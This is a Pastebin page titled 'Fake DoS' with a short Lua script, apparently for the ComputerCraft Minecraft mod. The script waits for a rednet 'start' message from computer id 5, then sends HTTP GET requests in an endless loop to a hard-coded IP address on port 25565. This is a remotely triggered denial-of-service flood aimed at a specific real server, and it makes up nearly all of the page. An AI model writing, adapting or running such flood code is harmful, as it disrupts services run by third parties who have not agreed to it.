Advertisement
Alakazard12

Fake DoS

Dec 24th, 2012
137
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.19 KB | None | 0 0
  1. rednet.open("back")
  2.  
  3. local id, msg
  4.  
  5. repeat
  6.     id, msg = rednet.receive()
  7. until id == 5 and msg == "start"
  8.  
  9. while true do
  10.     print(math.random())
  11.     http.get("http://71.80.179.93:25565")
  12. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement